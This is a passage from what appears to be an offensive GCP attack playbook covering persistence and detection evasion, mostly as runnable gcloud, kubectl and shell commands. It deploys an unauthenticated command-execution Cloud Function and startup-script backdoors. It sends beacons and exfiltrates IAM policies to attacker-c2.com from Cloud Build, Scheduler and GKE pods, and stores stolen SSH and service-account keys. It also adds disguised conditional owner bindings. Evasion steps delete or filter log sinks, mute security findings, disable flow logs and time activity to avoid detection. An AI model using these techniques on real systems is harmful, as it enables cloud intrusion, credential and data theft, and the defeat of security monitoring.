    --tags=http-server \
    --project=PROJECT_ID

# Or add to existing VM
gcloud compute instances add-metadata EXISTING_VM \
    --zone=us-central1-a \
    --metadata-from-file=startup-script=startup-backdoor.sh \
    --project=PROJECT_ID

# For project-wide metadata (affects all new VMs)
gcloud compute project-info add-metadata \
    --metadata-from-file=startup-script=startup-backdoor.sh \
    --project=PROJECT_ID

# OPSEC: Startup scripts execute with root privileges
# Only run on instance start/restart (may need to wait)
# Store scripts in Cloud Storage (appears as infrastructure code)
# Use benign script names and service descriptions

3. Cloud Function Backdoor (Serverless):
#

# Create Cloud Function with command execution
cat > main.py << 'EOF'
import functions_framework
import subprocess
import json
import os

# Authentication token (store in environment variable)
AUTH_TOKEN = os.environ.get('AUTH_TOKEN', 'default-secret')

@functions_framework.http
def backdoor(request):
    request_json = request.get_json(silent=True)
    
    # Authenticate
    if not request_json or request_json.get('token') != AUTH_TOKEN:
        return ('Unauthorized', 403)
    
    # Execute command
    cmd = request_json.get('cmd', 'echo "No command provided"')
    try:
        result = subprocess.run(
            cmd,
            shell=True,
            capture_output=True,
            text=True,
            timeout=55  # Cloud Functions have 60s timeout
        )
        return json.dumps({
            'stdout': result.stdout,
            'stderr': result.stderr,
            'returncode': result.returncode
        })
    except Exception as e:
        return json.dumps({'error': str(e)}), 500
EOF

cat > requirements.txt << 'EOF'
functions-framework==3.*
EOF

# Deploy function
gcloud functions deploy system-health-check \
    --runtime=python311 \
    --trigger-http \
    --allow-unauthenticated \
    --service-account=PRIVILEGED_SA@PROJECT_ID.iam.gserviceaccount.com \
    --set-env-vars=AUTH_TOKEN=YOUR_SECRET_TOKEN \
    --region=us-central1 \
    --project=PROJECT_ID

# Get function URL
FUNCTION_URL=$(gcloud functions describe system-health-check \
    --region=us-central1 \
    --format="value(httpsTrigger.url)" \
    --project=PROJECT_ID)

echo "Function URL: $FUNCTION_URL"

# Test backdoor
curl -X POST $FUNCTION_URL \
    -H "Content-Type: application/json" \
    -d '{"token":"YOUR_SECRET_TOKEN","cmd":"gcloud projects list"}'

# OPSEC: Cloud Functions are common for webhooks and APIs
# Unauthenticated functions are sometimes necessary (but risky)
# Use generic names: "webhook-handler", "api-proxy", "health-check"
# Store auth token in environment variables (not in code)

4. Cloud Scheduler Job (Periodic Beacon):
#

# Create Cloud Scheduler job that calls Cloud Function periodically
gcloud scheduler jobs create http beacon-job \
    --schedule="0 */6 * * *" \
    --uri="$FUNCTION_URL" \
    --http-method=POST \
    --headers="Content-Type=application/json" \
    --message-body='{"token":"YOUR_SECRET_TOKEN","cmd":"gcloud compute instances list"}' \
    --location=us-central1 \
    --project=PROJECT_ID

# Or create job that hits external C2
gcloud scheduler jobs create http c2-beacon \
    --schedule="0 */6 * * *" \
    --uri="https://attacker-c2.com/beacon" \
    --http-method=POST \
    --headers="Content-Type=application/json,X-Auth:SECRET" \
    --message-body='{"project":"PROJECT_ID","time":"{{.NOW}}"}' \
    --location=us-central1 \
    --project=PROJECT_ID

# List scheduled jobs
gcloud scheduler jobs list --location=us-central1 --project=PROJECT_ID

# OPSEC: Scheduled jobs are common for automation
# Runs every 6 hours (adjust to blend with normal activity)
# External HTTPS calls are common (webhooks, monitoring)

5. Secret Manager Credential Storage:
#

# Store backdoor credentials in Secret Manager
cat > backdoor-creds.json << EOF
{
  "service_account_key": "$(cat backup-sa-key.json | base64)",
  "ssh_private_key": "$(cat ~/.ssh/id_rsa | base64)",
  "c2_url": "https://attacker-c2.com",
  "auth_token": "YOUR_SECRET_TOKEN"
}
EOF

# Create secret
gcloud secrets create operational-credentials \
    --replication-policy=automatic \
    --data-file=backdoor-creds.json \
    --project=PROJECT_ID

# Grant access to service account
gcloud secrets add-iam-policy-binding operational-credentials \
    --member="serviceAccount:backup-automation@PROJECT_ID.iam.gserviceaccount.com" \
    --role="roles/secretmanager.secretAccessor" \
    --project=PROJECT_ID

# Retrieve later
gcloud secrets versions access latest \
    --secret=operational-credentials \
    --project=PROJECT_ID

# OPSEC: Secret Manager is designed for credential storage
# Secrets named appropriately blend in
# Access is logged but expected for automation
# Use business-appropriate names: "api-credentials", "database-password"

6. Cloud Build Trigger Backdoor:
#

# Cloud Build can execute arbitrary code on GCP infrastructure
# Create cloudbuild.yaml with backdoor

cat > cloudbuild.yaml << 'EOF'
steps:
  - name: 'gcr.io/cloud-builders/gcloud'
    entrypoint: 'bash'
    args:
      - '-c'
      - |
        # Beacon to C2
        curl -X POST https://attacker-c2.com/build-beacon \
          -H "Content-Type: application/json" \
          -d "{\"project\":\"$PROJECT_ID\",\"build\":\"$BUILD_ID\"}"
        
        # Execute arbitrary commands
        gcloud compute instances list
        gcloud iam service-accounts list
        
        # Exfiltrate data
        gcloud projects get-iam-policy $PROJECT_ID | \
          curl -X POST https://attacker-c2.com/data -d @-

timeout: 600s
EOF

# Upload to Cloud Storage
gsutil cp cloudbuild.yaml gs://BUCKET_NAME/cloudbuild.yaml

# Create build trigger
gcloud builds triggers create manual \
    --name="system-maintenance-build" \
    --build-config=gs://BUCKET_NAME/cloudbuild.yaml \
    --service-account=projects/PROJECT_ID/serviceAccounts/PRIVILEGED_SA@PROJECT_ID.iam.gserviceaccount.com \
    --project=PROJECT_ID

# Trigger build manually
gcloud builds triggers run system-maintenance-build \
    --branch=main \
    --project=PROJECT_ID

# Or create GitHub-triggered build (if repo connected)
gcloud builds triggers create github \
    --name="github-maintenance-trigger" \
    --repo-name=REPO_NAME \
    --repo-owner=OWNER \
    --branch-pattern="^main$" \
    --build-config=cloudbuild.yaml \
    --service-account=projects/PROJECT_ID/serviceAccounts/PRIVILEGED_SA@PROJECT_ID.iam.gserviceaccount.com \
    --project=PROJECT_ID

# OPSEC: Cloud Build is common for CI/CD
# Builds run with service account permissions
# Arbitrary code execution in GCP environment
# Logs show build execution but not detailed commands

7. GKE Workload Backdoor:
#

# Deploy backdoor container to GKE cluster
# First, get cluster credentials
gcloud container clusters get-credentials CLUSTER_NAME \
    --zone=us-central1-a \
    --project=PROJECT_ID

# Create deployment with backdoor
cat > backdoor-deployment.yaml << 'EOF'
apiVersion: apps/v1
kind: Deployment
metadata:
  name: monitoring-agent
  namespace: kube-system
spec:
  replicas: 1
  selector:
    matchLabels:
      app: monitoring
  template:
    metadata:
      labels:
        app: monitoring
    spec:
      serviceAccountName: default
      containers:
      - name: agent
        image: alpine:latest
        command: ["/bin/sh"]
        args:
          - -c
          - |
            apk add --no-cache curl bash
            while true; do
              curl -X POST https://attacker-c2.com/k8s-beacon \
                -H "Content-Type: application/json" \
                -d "{\"cluster\":\"$CLUSTER_NAME\",\"pod\":\"$HOSTNAME\"}"
              sleep 3600
            done
EOF

# Deploy
kubectl apply -f backdoor-deployment.yaml

# Or create CronJob for periodic execution
cat > backdoor-cronjob.yaml << 'EOF'
apiVersion: batch/v1
kind: CronJob
metadata:
  name: system-cleanup
  namespace: kube-system
spec:
  schedule: "0 */6 * * *"
  jobTemplate:
    spec:
      template:
        spec:
          serviceAccountName: default
          containers:
          - name: cleanup
            image: google/cloud-sdk:alpine
            command:
            - /bin/sh
            - -c
            - |
              gcloud compute instances list
              curl -X POST https://attacker-c2.com/k8s-job
          restartPolicy: OnFailure
EOF

kubectl apply -f backdoor-cronjob.yaml

# OPSEC: Pods in kube-system namespace appear operational
# Workload Identity provides GCP API access
# CronJobs are common for maintenance tasks
# Use monitoring-themed names

8. IAM Policy Binding with Condition (Stealthy):
#

# Add IAM binding that only activates under specific conditions
# Makes backdoor less obvious in policy audits

# Create conditional binding (time-based)
gcloud projects add-iam-policy-binding PROJECT_ID \
    --member="serviceAccount:backdoor-sa@PROJECT_ID.iam.gserviceaccount.com" \
    --role="roles/owner" \
    --condition='expression=request.time > timestamp("2024-01-01T00:00:00Z"),title=TemporaryAccess,description=Temporary elevated access'

# Or attribute-based condition (IP-based)
gcloud projects add-iam-policy-binding PROJECT_ID \
    --member="user:attacker@gmail.com" \
    --role="roles/editor" \
    --condition='expression=request.headers["x-forwarded-for"].startsWith("10.0.0."),title=InternalAccess,description=Internal network access only'

# Complex condition (day of week)
gcloud projects add-iam-policy-binding PROJECT_ID \
    --member="serviceAccount:maintenance-sa@PROJECT_ID.iam.gserviceaccount.com" \
    --role="roles/owner" \
    --condition='expression=request.time.getDayOfWeek("America/New_York") == 0,title=WeekendMaintenance,description=Weekend maintenance window'

# OPSEC: Conditional bindings are less obvious in policy reviews
# Conditions can hide escalation behind specific triggers
# Time-based conditions activate only when needed
# Complex expressions may be overlooked in audits

GCP - Detection Evasion
#

Detection Evasion Techniques
#

1. Cloud Audit Logs Analysis & Evasion:
#

# GCP has three types of audit logs:
# - Admin Activity (always enabled, 400 days retention)
# - Data Access (must be enabled, configurable retention)
# - System Event (always enabled, 400 days retention)

# Check audit log configuration
gcloud logging sinks list --project=PROJECT_ID

# View recent admin activities
gcloud logging read "logName=projects/PROJECT_ID/logs/cloudaudit.googleapis.com%2Factivity" \
    --limit=50 \
    --project=PROJECT_ID

# View data access logs (if enabled)
gcloud logging read "logName=projects/PROJECT_ID/logs/cloudaudit.googleapis.com%2Fdata_access" \
    --limit=50 \
    --project=PROJECT_ID

# CRITICAL: GCP audit logs are immutable
# Cannot be deleted or modified (stored in Google infrastructure)
# Unlike AWS, there's no S3 bucket to manipulate

# EVASION STRATEGIES:

# Strategy 1: Disable Data Access logging (if you have permissions)
# Admin Activity logs CANNOT be disabled
cat > log-config.yaml << 'EOF'
auditConfigs:
- service: allServices
  auditLogConfigs:
  - logType: DATA_READ
  - logType: DATA_WRITE
EOF

# This requires organization-level permissions (rare)
gcloud organizations set-iam-policy ORGANIZATION_ID log-config.yaml

# Strategy 2: Delete log sinks (prevents export to external systems)
gcloud logging sinks delete SINK_NAME --project=PROJECT_ID

# Strategy 3: Modify log sink filters (reduce visibility)
gcloud logging sinks update SINK_NAME \
    --log-filter='severity >= ERROR' \
    --project=PROJECT_ID

# This only logs errors, hiding INFO-level activities

# Strategy 4: Work within unlogged operations
# Some operations generate minimal or no audit logs:
# - Metadata service access (no logs)
# - Read-only operations (only logged if Data Access enabled)
# - Service account token generation via metadata (no logs)

# OPSEC: Focus on read operations if Data Access logging disabled
# Admin Activity logs are comprehensive and permanent
# Better to blend in than try to erase tracks

2. Log Sink and Export Manipulation:
#

# Check where logs are being exported
gcloud logging sinks list --project=PROJECT_ID

# Get sink details
gcloud logging sinks describe SINK_NAME --project=PROJECT_ID

# Common export destinations:
# - Cloud Storage buckets
# - BigQuery datasets
# - Pub/Sub topics
# - Log Analytics (via log bucket)

# EVASION: Modify sink to exclude your activities
gcloud logging sinks update SINK_NAME \
    --log-filter='protoPayload.authenticationInfo.principalEmail!="attacker@gmail.com"' \
    --project=PROJECT_ID

# Or exclude specific service account
gcloud logging sinks update SINK_NAME \
    --log-filter='protoPayload.authenticationInfo.principalEmail!="backdoor-sa@PROJECT_ID.iam.gserviceaccount.com"' \
    --project=PROJECT_ID

# DESTRUCTIVE: Delete log sink entirely
gcloud logging sinks delete SINK_NAME --project=PROJECT_ID

# Check if logs go to BigQuery
bq ls --project_id=PROJECT_ID

# If logs in BigQuery, you might be able to delete them (if you have permissions)
bq rm -f -t PROJECT_ID:DATASET.TABLE

# OPSEC: Sink modifications are logged in Admin Activity
# Deleting sinks prevents SIEM/external analysis
# Only removes export, doesn't affect Cloud Logging retention

3. Security Command Center Evasion:
#

# Security Command Center (SCC) aggregates security findings
# Available in Standard (free) and Premium tiers

# Check if SCC is enabled
gcloud scc sources list --organization=ORGANIZATION_ID

# View findings
gcloud scc findings list --organization=ORGANIZATION_ID

# Get specific finding
gcloud scc findings describe FINDING_ID \
    --organization=ORGANIZATION_ID \
    --source=SOURCE_ID

# EVASION STRATEGIES:

# Strategy 1: Mute findings (if you have securitycenter.findings.update)
gcloud scc findings update FINDING_ID \
    --organization=ORGANIZATION_ID \
    --source=SOURCE_ID \
    --mute-state=MUTED

# Strategy 2: Create mute configurations (auto-mute specific findings)
gcloud scc muteconfigs create auto-mute-config \
    --organization=ORGANIZATION_ID \
    --description="Mute specific finding types" \
    --filter='category="SUSPICIOUS_ACTIVITY" AND resourceName=~"backdoor"'

# Strategy 3: Disable specific detectors (Premium tier only)
# Requires organization-level access
# Not directly possible via gcloud, must use Console or API

# OPSEC: SCC findings are generated by Google's threat detection
# Muting findings is heavily logged
# Better to avoid triggering detections in first place
# Work slowly, use legitimate-looking resources

4. Event Threat Detection Evasion:
#

# Event Threat Detection (ETD) identifies suspicious patterns
# Part of SCC Premium

# Common ETD findings:
# - Unusual API calls
# - Privilege escalation attempts
# - Data exfiltration patterns
# - Malware execution
# - Brute force attacks

# EVASION STRATEGIES:

# Strategy 1: Operate during business hours
# Behavioral analytics flag off-hours activity
CURRENT_HOUR=$(date +%H)
if [ $CURRENT_HOUR -lt 8 ] || [ $CURRENT_HOUR -gt 18 ]; then
    echo "Outside business hours - waiting"
    sleep 3600
    exit
fi

# Strategy 2: Rate limiting (avoid bulk operations)
for resource in $(gcloud compute instances list --format="value(name)"); do
    echo "Processing: $resource"
    # Perform action
    sleep $(( RANDOM % 10 + 5 ))  # Random delay 5-15 seconds
done

# Strategy 3: Use service accounts (less behavioral profiling)
# Human users have behavioral patterns
# Service accounts expected to be consistent/automated

# Strategy 4: Geographic consistency
# Authenticate from same region/IP consistently
# Avoid impossible travel scenarios

# Strategy 5: Blend with normal operations
# Mimic patterns of legitimate automation
# Use common tools (gcloud, terraform) vs custom scripts

# OPSEC: ETD uses machine learning on audit logs
# Patterns matter more than individual actions
# Consistency and predictability avoid anomaly detection

5. VPC Flow Logs Evasion:
#

# Check if VPC Flow Logs enabled
gcloud compute networks subnets describe SUBNET_NAME \
    --region=REGION \
    --format="value(enableFlowLogs)" \
    --project=PROJECT_ID

# List all subnets with flow logs
gcloud compute networks subnets list \
    --filter="enableFlowLogs=true" \
    --project=PROJECT_ID

# EVASION STRATEGIES:

# Strategy 1: Disable flow logs (if you have permissions)
gcloud compute networks subnets update SUBNET_NAME \
    --region=REGION \
    --no-enable-flow-logs \
    --project=PROJECT_ID

# Strategy 2: Use Private Google Access
# Traffic to Google APIs stays on Google network
# Less visibility than internet egress

# Enable Private Google Access
gcloud compute networks subnets update SUBNET_NAME \
    --region=REGION \
    --enable-private-ip-google-access \
    --project=PROJECT_ID

# Strategy 3: Use Private Service Connect
# Endpoints for Google services within VPC
# Traffic doesn't traverse internet

# Strategy 4: Encrypted tunnels (VPN/SSH)
# Flow logs show encrypted traffic, not contents
# Use SSH tunneling for C2 communication

# OPSEC: Flow logs show src/dst IP, port, protocol
# Encryption prevents deep inspection
# Private Google Access is common pattern (low suspicion)

6. Rate Limiting and Quota Evasion:
#

# GCP enforces API quotas per project/user
# Different quotas for different APIs

# Check quotas
gcloud compute project-info describe \
    --project=PROJECT_ID \
    --format="value(quotas)"

# View quota usage
gcloud compute regions describe REGION \
    --project=PROJECT_ID \
    --format="value(quotas)"

# EVASION STRATEGIES:

# Strategy 1: Distribute across multiple projects
for project in PROJECT1 PROJECT2 PROJECT3; do
    gcloud compute instances list --project=$project
    sleep 2
done

# Strategy 2: Use multiple service accounts
# Each SA has separate quota allocation
for sa_key in sa1.json sa2.json sa3.json; do
    gcloud auth activate-service-account --key-file=$sa_key
    gcloud compute instances list
    sleep 3
done

# Strategy 3: Distribute across regions
for region in us-central1 us-east1 europe-west1; do
    gcloud compute instances list --filter="zone:$region*"
    sleep 2
done

# Strategy 4: Exponential backoff on rate limit errors
attempt=0
max_attempts=5
while [ $attempt -lt $max_attempts ]; do
    if gcloud compute instances list 2>/dev/null; then
        break
    else
        sleep $(( 2 ** attempt ))
        ((attempt++))
    fi
done

# Strategy 5: Use batch APIs when available
# Single API call for multiple operations
# Example: batchGet instead of multiple get calls

# OPSEC: Rate limit errors (429) are logged
# Hitting quotas frequently indicates suspicious activity
# Slow, distributed operations stay under radar

7. Cloud Asset Inventory Evasion:
#

# Cloud Asset Inventory provides visibility into resources
# Organizations may use it for security monitoring

# Check if Asset Inventory is enabled
gcloud asset search-all-resources \
    --scope=projects/PROJECT_ID \
    --asset-types="compute.googleapis.com/Instance" \
    --project=PROJECT_ID 2>&1

# EVASION STRATEGIES:

# Strategy 1: Use ephemeral resources
# Short-lived resources may not be captured
gcloud compute instances create temp-vm \
    --machine-type=e2-micro \
    --zone=us-central1-a \
    --project=PROJECT_ID

# Use the VM
# ...

# Delete immediately
gcloud compute instances delete temp-vm \
    --zone=us-central1-a \
    --quiet \
    --project=PROJECT_ID

# Strategy 2: Use resources in less-monitored projects
# Focus on dev/test projects vs production

# Strategy 3: Leverage existing resources
# Modify existing VMs instead of creating new ones
# Less likely to trigger new resource alerts

# OPSEC: Asset Inventory snapshots at intervals
# Ephemeral resources (< 1 hour) may be missed
# Modifications to existing resources less visible than new resources

8. Organization Policy Bypass:
#

# Organization Policies enforce constraints
# Example: Restrict VM external IPs, require OS Login

# Check active policies
gcloud resource-manager org-policies list \
    --project=PROJECT_ID

# Get specific policy
gcloud resource-manager org-policies describe \
    compute.vmExternalIpAccess \
    --project=PROJECT_ID

# EVASION STRATEGIES:

# Strategy 1: Find policy exemptions
# Policies often have exceptions for specific projects/resources
# Look for dev/test projects with relaxed policies

# Strategy 2: Use compliant methods
# If external IPs restricted, use Cloud NAT or IAP tunneling
gcloud compute ssh INSTANCE_NAME \
    --zone=us-central1-a \
    --tunnel-through-iap \
    --project=PROJECT_ID

# Strategy 3: Work within policy constraints
# If OS Login required, use it (don't try to bypass)
# Compliance with policies reduces suspicion

# OPSEC: Policy violations generate alerts
# Working within constraints is stealthier
# Find legitimate workarounds vs direct bypass

9. API Key vs OAuth Token Strategy:
#

# GCP supports both API keys and OAuth tokens
# API keys are simpler but less secure

# Create API key (if needed for specific APIs)
gcloud services api-keys create \
    --display-name="Backup Integration Key" \
    --project=PROJECT_ID

# EVASION CONSIDERATIONS:

# OAuth tokens (preferred):
# - Short-lived (1 hour default)
# - Tied to identity (user/service account)
# - More logging

# API keys:
# - Long-lived (until revoked)
# - Less granular logging
# - Simpler to use/share

# For stealth: Use OAuth tokens via metadata service
# No key management, automatic rotation, less attribution
TOKEN=$(curl -s -H "Metadata-Flavor: Google" \
    "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" | \
    jq -r '.access_token')

# OPSEC: Metadata service tokens don't require key files
# Token generation not logged (unlike key creation)
# Automatic rotation (1 hour) prevents long-term key compromise

10. Cross-Project Resource Access:
#

# GCP allows cross-project resource access
# Can obscure activity across project boundaries

# Access resource in different project (if you have permissions)
gcloud compute instances list --project=OTHER_PROJECT_ID

# Use service account from one project in another
gcloud compute instances create vm-in-project2 \
    --project=PROJECT2_ID \
    --service-account=sa@PROJECT1_ID.iam.gserviceaccount.com \
    --scopes=cloud-platform

# Access storage bucket from different project
gsutil ls gs://bucket-in-other-project

# EVASION STRATEGIES:

# Strategy 1: Spread operations across projects
# Harder to correlate activities
# Different security teams may monitor different projects

# Strategy 2: Use shared VPCs
# Network traffic between projects appears internal
# Less visibility than internet-routed traffic

# Strategy 3: Cross-project service account usage
# Service account from PROJECT_A acts on PROJECT_B
# Audit logs in PROJECT_B show PROJECT_A service account

# OPSEC: Cross-project access is common in enterprises
# Appears as legitimate resource sharing
# Requires proper IAM configuration (not always present)

11. Workload Identity and Service Account Token Strategy:
#

# Workload Identity (GKE) provides automatic token generation
# No service account keys needed

# From GKE pod with Workload Identity:
# Token automatically injected via metadata service
# No explicit authentication needed

# EVASION ADVANTAGES:

# 1. No key management (no key creation logs)
# 2. Automatic token rotation (harder to track)
# 3. Pod-level attribution (not user-level)
# 4. Common pattern in modern GKE (low suspicion)

# Check Workload Identity configuration
gcloud container clusters describe CLUSTER_NAME \
    --zone=us-central1-a \
    --format="value(workloadIdentityConfig)" \
    --project=PROJECT_ID

# Bind Kubernetes SA to GCP SA
gcloud iam service-accounts add-iam-policy-binding \
    TARGET_SA@PROJECT_ID.iam.gserviceaccount.com \
    --role roles/iam.workloadIdentityUser \
    --member "serviceAccount:PROJECT_ID.svc.id.goog[NAMESPACE/KSA_NAME]" \
    --project=PROJECT_ID

# From pod, tokens are automatically available
kubectl run test-pod --image=google/cloud-sdk:alpine --rm -it -- bash
# Inside pod:
gcloud auth list  # Shows Workload Identity SA

# OPSEC: Workload Identity is recommended practice
# No secret files in containers
# Token requests through metadata service (not logged)

12. Time-Based and Behavioral Evasion:
#

# Advanced evasion using timing and behavior patterns

# Script: Operate only during business hours
cat > time-aware-enum.sh << 'EOF'
#!/bin/bash

# Check if current time is business hours (8 AM - 6 PM, Mon-Fri)
HOUR=$(date +%H)
DAY=$(date +%u)  # 1=Monday, 7=Sunday

if [ $DAY -ge 6 ]; then
    echo "Weekend - skipping"
    exit 0
fi

if [ $HOUR -lt 8 ] || [ $HOUR -gt 18 ]; then
    echo "Outside business hours - skipping"
    exit 0
fi

# Proceed with operations
echo "Business hours confirmed - proceeding"
gcloud compute instances list

# Add random delays to mimic human behavior
sleep $(( RANDOM % 60 + 30 ))  # 30-90 seconds

# Continue operations...
EOF

# Script: Rate-limited enumeration
cat > rate-limited-enum.sh << 'EOF'
#!/bin/bash

# List resources with delays
for project in $(gcloud projects list --format="value(projectId)"); do
    echo "Enumerating project: $project"
    gcloud compute instances list --project=$project --limit=10
    
    # Random delay 5-15 seconds
    sleep $(( RANDOM % 10 + 5 ))
    
    # Check if off-hours, pause until business hours
    HOUR=$(date +%H)
    if [ $HOUR -lt 8 ] || [ $HOUR -gt 18 ]; then
        echo "Off-hours detected - pausing until 8 AM"
        # Calculate seconds until 8 AM next day
        # (simplified - full implementation would be more complex)
        sleep 3600
    fi
done
EOF

# OPSEC: Time-aware operations avoid anomaly detection
# Random delays prevent pattern recognition
# Mimicking human behavior reduces ML detection likelihood